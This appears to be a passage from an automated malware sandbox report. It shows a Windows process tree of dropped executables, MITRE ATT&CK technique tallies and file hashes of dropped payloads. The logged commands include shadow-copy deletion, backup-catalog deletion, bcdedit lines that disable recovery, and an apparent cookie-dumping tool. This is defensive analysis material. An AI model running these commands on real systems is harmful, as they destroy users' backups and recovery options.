                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Adds Run key to start application
                                                                                      PID:2540
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                          PID:2980
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3032
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:760
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1404
                                                                                    • C:\Windows\system32\conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe "69986340-51749947-120789867918322993801601325432551546611119269294-1278430945"
                                                                                      1⤵
                                                                                        PID:924
                                                                                      • C:\Windows\system32\conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe "925040611-1626283612378552031264010316-2105131817403490294173510782-376130176"
                                                                                        1⤵
                                                                                          PID:2744
                                                                                        • C:\Users\Admin\AppData\Local\Temp\74C3.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\74C3.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Enumerates connected drives
                                                                                          PID:1780
                                                                                          • C:\Users\Admin\AppData\Local\Temp\74C3.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\74C3.exe" -agent 0
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            • Drops file in Windows directory
                                                                                            PID:2536
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                            2⤵
                                                                                              PID:1664
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                wmic shadowcopy delete
                                                                                                3⤵
                                                                                                  PID:1512
                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                  3⤵
                                                                                                  • Interacts with shadow copies
                                                                                                  PID:2656
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                2⤵
                                                                                                  PID:2772
                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                    3⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:1960
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                  2⤵
                                                                                                    PID:320
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                    2⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                    PID:3060
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                    2⤵
                                                                                                      PID:1812
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                      2⤵
                                                                                                        PID:1736
                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                        notepad.exe
                                                                                                        2⤵
                                                                                                          PID:1972
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C978.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\C978.exe
                                                                                                        1⤵
                                                                                                          PID:2144
                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe "-137759550418775177671025498948-967247109-1464060916-1483460183-18959537011140032642"
                                                                                                          1⤵
                                                                                                            PID:2708
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            wmic shadowcopy delete
                                                                                                            1⤵
                                                                                                              PID:2964
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\CF71.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\CF71.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:804
                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe "335847774396110497-74519912717087284913867855541861425582-859053290414382378"
                                                                                                              1⤵
                                                                                                                PID:2616
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A8F.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\A8F.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:1028
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A8F.exe
                                                                                                                  "{path}"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:2896
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                    3⤵
                                                                                                                      PID:1280
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2AAD.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2AAD.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1880
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2AAD.exe"
                                                                                                                    2⤵
                                                                                                                      PID:1408
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:1640
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4233.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4233.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:2104
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                      2⤵
                                                                                                                        PID:2964
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\59D9.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\59D9.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2456
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6234.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6234.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1512
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8483.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8483.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:1008
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                        2⤵
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:2636
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\A2BE.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\A2BE.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:2928
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A2BE.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\A2BE.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:3064
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C6B3.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C6B3.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2792
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D7E3.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\D7E3.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2108
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F572.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F572.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2524
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\58D7.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\58D7.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2384
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:1860
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:1348
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:2156
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:1524
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:2992
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:2664
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:2416
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:616
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2144

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                        Persistence

                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                        1
                                                                                                                        T1060

                                                                                                                        BITS Jobs

                                                                                                                        1
                                                                                                                        T1197

                                                                                                                        Defense Evasion

                                                                                                                        File Deletion

                                                                                                                        2
                                                                                                                        T1107

                                                                                                                        Modify Registry

                                                                                                                        3
                                                                                                                        T1112

                                                                                                                        BITS Jobs

                                                                                                                        1
                                                                                                                        T1197

                                                                                                                        Install Root Certificate

                                                                                                                        1
                                                                                                                        T1130

                                                                                                                        Credential Access

                                                                                                                        Credentials in Files

                                                                                                                        3
                                                                                                                        T1081

                                                                                                                        Discovery

                                                                                                                        Software Discovery

                                                                                                                        1
                                                                                                                        T1518

                                                                                                                        Security Software Discovery

                                                                                                                        1
                                                                                                                        T1063

                                                                                                                        Query Registry

                                                                                                                        4
                                                                                                                        T1012

                                                                                                                        System Information Discovery

                                                                                                                        5
                                                                                                                        T1082

                                                                                                                        Peripheral Device Discovery

                                                                                                                        2
                                                                                                                        T1120

                                                                                                                        Remote System Discovery

                                                                                                                        1
                                                                                                                        T1018

                                                                                                                        Collection

                                                                                                                        Data from Local System

                                                                                                                        3
                                                                                                                        T1005

                                                                                                                        Command and Control

                                                                                                                        Web Service

                                                                                                                        1
                                                                                                                        T1102

                                                                                                                        Impact

                                                                                                                        Inhibit System Recovery

                                                                                                                        2
                                                                                                                        T1490

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                          MD5

                                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                          SHA1

                                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                          SHA256

                                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                          SHA512

                                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                          MD5

                                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                          SHA1

                                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                          SHA256

                                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                          SHA512

                                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                        • C:\Program Files\MSBuild\MBCFTWILHZ\ultramediaburner.exe
                                                                                                                          MD5

                                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                          SHA1

                                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                          SHA256

                                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                          SHA512

                                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                        • C:\Program Files\MSBuild\MBCFTWILHZ\ultramediaburner.exe
                                                                                                                          MD5

                                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                          SHA1

                                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                          SHA256

                                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                          SHA512

                                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                        • C:\Program Files\install.dat
                                                                                                                          MD5

                                                                                                                          806c3221a013fec9530762750556c332

                                                                                                                          SHA1

                                                                                                                          36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                          SHA256

                                                                                                                          9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                          SHA512

                                                                                                                          56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                        • C:\Program Files\install.dll
                                                                                                                          MD5

                                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                          SHA1

                                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                          SHA256

                                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                          SHA512

                                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                          MD5

                                                                                                                          ad567fa2cdd69c0d9dd56cdc08651a26

                                                                                                                          SHA1

                                                                                                                          2c9804f67d5fb636444a3cd69ca79ac3c790ab54

                                                                                                                          SHA256

                                                                                                                          55be6cd68775a1eb1d599ee3601728923d66161017da4fea65a674e57e0a753b

                                                                                                                          SHA512

                                                                                                                          1b13dc94081a88ba1997af9ee85b588e7bc67917afddde9953b8584160213c197d472abc79bd9c26695bf8085fe1a805fee8c42b5dabf46a0d361cb125f95afb

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                          MD5

                                                                                                                          349b0f0b9076365bae24c0a44a307f78

                                                                                                                          SHA1

                                                                                                                          7be4c01a7578bda3f062c8e5cb899a3c3abb7759

                                                                                                                          SHA256

                                                                                                                          87ae4d3f957a7d09c74a855b26d83bb9ebeba1458fe5dff2a2a0029242bc5c36

                                                                                                                          SHA512

                                                                                                                          62f791567b34737453564312e10c20f255cc3996aa7cecf3abcf361ab7ad0d5b6067191943fe8f2ab49e0f16164ab364717936db941c648217179b7f7e0bb8e1

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                          MD5

                                                                                                                          e63b113ffd2ef3e397be64137ba0f681

                                                                                                                          SHA1

                                                                                                                          bbd0b203fb39cde0d5a3ae869518cfa86f46c3e6

                                                                                                                          SHA256

                                                                                                                          2be033fcb73dee09124abe8954f4d6c3fff0a23051d08760dcccfc176395a189

                                                                                                                          SHA512

                                                                                                                          617d8553b31b460d928446c5616f19274caf0495e06cbd6a4ba22c63cb915a3dd1b500e4c9908416fb870c989fa1248ec5533f2caf5544f76eea58cacec7525c

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                          MD5

                                                                                                                          db2ac017a16cde0be9fcb32574f62067

                                                                                                                          SHA1

                                                                                                                          d25f54df559f3c4fb46d3db499a5fd6003c2e59c

                                                                                                                          SHA256

                                                                                                                          37b340478d69a13c5062e463f47c384835b68dd3ba30b67d986f998a15c0cf56

                                                                                                                          SHA512

                                                                                                                          62810997ff8bbae6f37b9a4e313a5f1147cf8163a3ca24c938470ef0be873cbbf368c6297874738a7b2c15a6906cb1ee9a8706e777c9d02eee8f520c7da33850

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                          MD5

                                                                                                                          4e6f49c2738b4e88089e2508ab36bcbd

                                                                                                                          SHA1

                                                                                                                          cbb8a8a4cb542c751f1ecd1ae919bd897d0fc946

                                                                                                                          SHA256

                                                                                                                          bc6cd135b36fc028674b84cb596ab85af901ebf58d9c20e96ac8e7de4917079c

                                                                                                                          SHA512

                                                                                                                          b512f64f32f4cec256d7346de6e507309972d0d8b0f9ddae2a6576f381ad46b98643d6394d5109811b08f67df8a0e7d23d413457512d47127a38b1c487050ded

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22-15aa7-615-2a9b2-c065dae1db029\Bohavaexeho.exe
                                                                                                                          MD5

                                                                                                                          18e49540637bccc9b3a7ca3d48cae223

                                                                                                                          SHA1

                                                                                                                          b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                          SHA256

                                                                                                                          698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                          SHA512

                                                                                                                          a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22-15aa7-615-2a9b2-c065dae1db029\Bohavaexeho.exe
                                                                                                                          MD5

                                                                                                                          18e49540637bccc9b3a7ca3d48cae223

                                                                                                                          SHA1

                                                                                                                          b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                          SHA256

                                                                                                                          698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                          SHA512

                                                                                                                          a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22-15aa7-615-2a9b2-c065dae1db029\Bohavaexeho.exe.config
                                                                                                                          MD5

                                                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                                                          SHA1

                                                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                          SHA256

                                                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                          SHA512

                                                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                          MD5

                                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                          SHA1

                                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                          SHA256

                                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                          SHA512

                                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                          MD5

                                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                          SHA1

                                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                          SHA256

                                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                          SHA512

                                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                          MD5

                                                                                                                          3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                          SHA1

                                                                                                                          55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                          SHA256

                                                                                                                          4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                          SHA512

                                                                                                                          f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                          MD5

                                                                                                                          3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                          SHA1

                                                                                                                          55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                          SHA256

                                                                                                                          4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                          SHA512

                                                                                                                          f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                          MD5

                                                                                                                          3bc84c0e8831842f2ae263789217245d

                                                                                                                          SHA1

                                                                                                                          d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                          SHA256

                                                                                                                          757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                          SHA512

                                                                                                                          f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                          MD5

                                                                                                                          e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                          SHA1

                                                                                                                          1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                          SHA256

                                                                                                                          8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                          SHA512

                                                                                                                          71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                          MD5

                                                                                                                          e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                          SHA1

                                                                                                                          1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                          SHA256

                                                                                                                          8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                          SHA512

                                                                                                                          71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ab-14f7c-b68-6dc96-4d24c4268baea\Vushudamaja.exe
                                                                                                                          MD5

                                                                                                                          2e91d25073151415f8c39de2262cbba8

                                                                                                                          SHA1

                                                                                                                          32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                          SHA256

                                                                                                                          0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                          SHA512

                                                                                                                          306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ab-14f7c-b68-6dc96-4d24c4268baea\Vushudamaja.exe
                                                                                                                          MD5

                                                                                                                          2e91d25073151415f8c39de2262cbba8

                                                                                                                          SHA1

                                                                                                                          32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                          SHA256

                                                                                                                          0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                          SHA512

                                                                                                                          306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ab-14f7c-b68-6dc96-4d24c4268baea\Vushudamaja.exe.config
                                                                                                                          MD5

                                                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                                                          SHA1

                                                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                          SHA256

                                                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                          SHA512

                                                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-4NRML.tmp\Ultra.exe
                                                                                                                          MD5

                                                                                                                          cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                          SHA1

                                                                                                                          ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                          SHA256

                                                                                                                          0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                          SHA512

                                                                                                                          49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-4NRML.tmp\Ultra.exe
                                                                                                                          MD5

                                                                                                                          cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                          SHA1

                                                                                                                          ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                          SHA256

